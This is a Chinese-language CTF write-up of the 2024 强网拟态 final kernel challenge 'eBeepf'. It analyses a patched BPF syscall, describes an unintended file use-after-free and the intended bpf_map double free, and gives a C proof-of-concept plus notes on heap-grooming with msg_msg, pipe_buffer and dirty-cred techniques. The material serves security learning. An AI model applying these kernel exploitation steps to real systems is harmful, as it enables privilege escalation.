强网拟态 2024 决赛: eBeepf

Qanux

2025-01-15

写在最前面

拟态决赛已经结束了有一段时间了，至于为什么要写这一篇博客是因为我发现当时我们在比赛时好像非预期了，而且非预期后题目难度大幅度下降，所以我觉得很有必要分享一下我们当时的做法。

信息收集

又是 linux kernel 没什么好说的，内核版本是 6.11.7

                           @@@@
                           @@@
                          @@@
                        @@@@@
             @@@     @@@@@@@@@@@    @@@@@
       @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
      @@+            +@@@@@@@@@@@@@
      @%  +%%%@@@@@%*= #@@@@@@@@@@@
      @@@           -=%@@@@@@@@@@@@
       @@@%        +#@@@@@@@**%@@@@
         @@@@@@@@@@%=   #@++%  #@@
          @@@:*@@@%-   +@*  *#  #@@
          @@#:-#@@@@%==#@=  -**  #@@
          @@@-:-+@@@@@@@@+   %#=  @@
           @@@=:::=*@@@@@@##+=#+  %@@
            @@@%=::::::-#@@=  ###%@@@
            @@@@@@@@@@@@@@@@@ #   @@@
            @@@   @@@@      @@@@@@@@

Boot took 1.99 seconds

/ $ uname -r
6.11.7

附件给了一个 bee.patch

diff -r linux-6.11.7/include/uapi/linux/bpf.h linux-6.11.7.patched/include/uapi/linux/bpf.h
960a961
> 	BPF_MAP_RESET_REF,
diff -r linux-6.11.7/kernel/bpf/syscall.c linux-6.11.7.patched/kernel/bpf/syscall.c
5690a5691,5711
> static int bpf_map_do_reset_ref(union bpf_attr *attr)
> {
>       int ufd = attr->map_fd;
>       struct bpf_map *map;
>       struct fd f;
>       f = fdget(ufd);
>       map = __bpf_map_get(f);
>       if (IS_ERR(map)) {
>               fdput(f);
>               return PTR_ERR(map);
>       }
>       if (map->max_entries > 60) {
>               fdput(f);
>               return -EINVAL;
>       }
>       atomic64_set(&map->refcnt, 1);
>       atomic64_set(&map->sleepable_refcnt, 0);
>       fdput(f);
>       return 0;
> }
> 
5825a5847,5849
> 		break;
> 	case BPF_MAP_RESET_REF:
> 		err = bpf_map_do_reset_ref(&attr);

可以看到出题人给内核的 bpf 模块加了一个新的功能，那么漏洞应该就在这里了。

漏洞分析与利用

fd 结构体的定义如下：

struct fd {
	struct file *file;
	unsigned int flags;
};

其实就是 file 结构体再另外加了一个 flags 标志位

fdget 会经过多层调用最终调用 __fget_light 函数

static inline struct fd fdget(unsigned int fd)
{
	return __to_fd(__fdget(fd));
}

fdget 调用 __fdget

unsigned long __fdget(unsigned int fd)
{
	return __fget_light(fd, FMODE_PATH);
}

__fdget 调用 __fget_light

/*
 * Lightweight file lookup - no refcnt increment if fd table isn't shared.
 *
 * You can use this instead of fget if you satisfy all of the following
 * conditions:
 * 1) You must call fput_light before exiting the syscall and returning control
 *    to userspace (i.e. you cannot remember the returned struct file * after
 *    returning to userspace).
 * 2) You must not call filp_close on the returned struct file * in between
 *    calls to fget_light and fput_light.
 * 3) You must not clone the current task in between the calls to fget_light
 *    and fput_light.
 *
 * The fput_needed flag returned by fget_light should be passed to the
 * corresponding fput_light.
 */
static unsigned long __fget_light(unsigned int fd, fmode_t mask)
{
	struct files_struct *files = current->files;
	struct file *file;

	/*
	 * If another thread is concurrently calling close_fd() followed
	 * by put_files_struct(), we must not observe the old table
	 * entry combined with the new refcount - otherwise we could
	 * return a file that is concurrently being freed.
	 *
	 * atomic_read_acquire() pairs with atomic_dec_and_test() in
	 * put_files_struct().
	 */
	if (likely(atomic_read_acquire(&files->count) == 1)) {
		file = files_lookup_fd_raw(files, fd);
		if (!file || unlikely(file->f_mode & mask))
			return 0;
		return (unsigned long)file;
	} else {
		file = __fget_files(files, fd, mask);
		if (!file)
			return 0;
		return FDPUT_FPUT | (unsigned long)file;
	}
}

注意看这个 __fget_light 函数，该函数用于根据文件描述符（fd）获取对应的文件结构体 struct file，但是它有一些限制条件，使得它的使用比标准的文件获取函数 fget 更加轻量级。以下是代码的主要功能和步骤的解释：
函数先通过 files_struct *files = current->files 获取当前进程的文件描述符表，如果当前进程的文件描述符表引用计数为 1 (atomic_read_acquire(&files->count) == 1)，说明没有其他线程正在操作这个文件描述符表，可以执行轻量级的查找，直接调用 files_lookup_fd_raw 在文件描述符表中查找对应的文件结构体 struct file。

如果文件描述符表的引用计数不为 1 (atomic_read_acquire(&files->count) != 1)，说明可能有线程正在操作这个表，此时需要执行更重量级的查找，即调用 __fget_files_rcu 函数，如果读者这个函数的具体功能感兴趣的话可以自行去看源码，正常情况下他会返回当前 fd 所指向的 file 结构体并将其 f_count 加一。在调用完 __fget_files 函数后会给 fd 结构体的 flags 标志位加上一个 FDPUT_FPUT。

接下来是 fdput 函数，看这个函数名就感觉和 fput 功能很相识，其源码如下：

static inline void fdput(struct fd fd)
{
	if (fd.flags & FDPUT_FPUT)
		fput(fd.file);
}

其作用就是判断 fd 结构体的标志位是否存在 FDPUT_FPUT，如果存在则通过调用 fput 来令 file 结构体的 f_count 减一，而 FDPUT_FPUT 我们通过上面的分析可知需要利用多线程调用 __fget_light 才会给加上。

__bpf_map_get 函数比较重要，其源码如下：

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

__bpf_map_get 函数是用于获取 eBPF 映射的引用，该函数接收一个映射的文件描述符（eBPF 映射的文件描述符）作为参数，如果我们传入的文件描述符是一个普通的文件而不是 eBPF 的映射，那么 __bpf_map_get 就会调用 fdput 处理该 fd 结构体然后返回错误 -EINVAL。问题就出现在这个地方，我们再仔细看看这段 patch 的代码：

map = __bpf_map_get(f);
if (IS_ERR(map)) {
        fdput(f);
        return PTR_ERR(map);
}

在 __bpf_map_get 返回错误的时候还会再次调用 fdput 再处理一次 f 对象，也就是说如果我们传入的是普通文件的文件描述符而不是 eBPF 映射的文件描述符，这段新增的 bpf 功能将会对这个 fd 结构体对象执行两次 fdput，而通过我们上面的分析，如果 fd 结构体的标志位有 FDPUT_FPUT 的话会执行 fput，这样就会造成 file uaf。
所以在这道题目中我们只需要再创建一个线程在这个新增的 bpf 模块中传入一个普通文件的文件描述符即可构造出 file uaf，有了 file uaf 之后打法就多样化了，当时我们的做法是用 dirty cred 构造文件越权写，这里就不再赘述。

需要注意的是，在 linux kernel 6.12+ 之后这部分的代码发生了很大的改变，比如 __bpf_map_get 函数：

static inline struct bpf_map *__bpf_map_get(struct fd f)
{
	if (fd_empty(f))
		return ERR_PTR(-EBADF);
	if (unlikely(fd_file(f)->f_op != &bpf_map_fops))
		return ERR_PTR(-EINVAL);
	return fd_file(f)->private_data;
}

当传入的文件描述符不是 eBPF 映射的文件描述时不会再调用 fdput。

这道题目的预期漏洞应该就是在 patch 文件最下面的这个地方：

1 2	atomic64_set(&map->refcnt, 1); atomic64_set(&map->sleepable_refcnt, 0);

这里手动的将 bpf_map 结构体中的 refcnt 对象设置为 0。当我们使用 close 函数关闭 eBPF 文件的映射的时候内核会将该文件对应的 bpf_map 结构体的 refcont 对象减一并判断 refcnt 的值是否为 0，如果为 0，则释放该 bpf_map 结构体。若我们能够令 refcnt 的值大于一然后调用这个新增的 bpf 模块，就能够构造出对同一个 bpf_map 结构体的多次释放。一个 double free 的 poc 如下：

int key = 0;
prctl(PR_SET_NAME, "Qanux");
int inner_map = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 4, 10);
if (inner_map < 0) err_exit("Failed to bpf_map_create for inner_map");
printf("[+] inner_map: %d\n", inner_map);

int outer_map = create_bpf_array_of_map(inner_map, 4, 4, 10);
if (outer_map < 0) err_exit("Failed to bpf_map_create for outer_map");
printf("[+] outer_map: %d\n", outer_map);

puts("[+] set inner_map.ref = 2");
if (bpf_map_update_elem(outer_map, &key, &inner_map, BPF_ANY) < 0)
    err_exit("Failed to bpf_map_update_elem");

puts("[+] BUG set inner_map.ref = 1");
trigger(inner_map);

puts("[+] close outer_map to free inner_mmap's bpf_map object");
// frist free bpf_map
close(outer_map);

puts("[+] try to close inner_map");
// second free bpf_map
trigger(inner_map);
close(inner_map);

此时在 gdb 中即可看到非常明显的 double free，这里使用了 bata24/gef 这个插件，里面支持许多用于调试内核、各种类型的 heap 等指令，不过我不是很喜欢他的指令格式和 UI 界面。

gef> slub-dump kmalloc-512 -n -q
slab_caches @ 0xffffffffa9562c80

  kmem_cache: 0xffff987801042a00
    name: kmalloc-512
    flags: 0x10008 (SLAB_STORE_USER)
    object size: 0x200 (chunk size: 0x200)
    offset (next pointer in chunk): 0x100
    red_left_pad: 0x0
    kmem_cache_cpu (cpu0): 0xffff98780f632c20
      active page: 0xffffec9640078640
        virtual address: 0xffff987801e19000
        num pages: 1
        in-use: 6/8
        frozen: 1
        layout:   0x000 0xffff987801e19000 (next: 0xffff987801e19000: Corrupted (Loop detected))
                  0x001 0xffff987801e19200 (in-use)
                  0x002 0xffff987801e19400 (in-use)
                  0x003 0xffff987801e19600 (in-use)
                  0x004 0xffff987801e19800 (in-use)
                  0x005 0xffff987801e19a00 (in-use)
                  0x006 0xffff987801e19c00 (in-use)
                  0x007 0xffff987801e19e00 (in-use)
        freelist (fast path):
                  0x000 0xffff987801e19000
                        0xffff987801e19000: Corrupted (Loop detected)
        freelist (slow path): (none)
    next: 0xffff987801042900
gef>

由于这个内核编译时没有开启 CONFIG_SLAB_FREELIST_HARDENED 选项所以可以直接连续释放同一个 object 两次，如果开启后可以提前申请一个大小为 0x200 的 pipe_buffer 数组，在第一次释放 bpf_map 后释放该数组然后再次释放 bpf_map 即可。

在这个环境中 kmalloc-512 free_list 的 next 指针在偏移为 0x100 的位置，我们可以先用 msg 来占位该 double free 的堆块（后面称为 victim obj）并修改 next 指针的低位指向 victim obj + 0x30 的位置（防止修改 msg 头）。然后再申请 pipe_buffer 来再次占位 victim obj（该 pipe_buffer 的起始位置位于 victim obj + 0x30），此时即可通过该 msg 来修改 pipe_buffer。接下来的攻击手段也有很多种，比如修改 pipe_buffer 的 flags 来打 dirty pipe、修改 pipe_buffer 的 page 指针来构造 page uaf 等，这里也不再做赘述。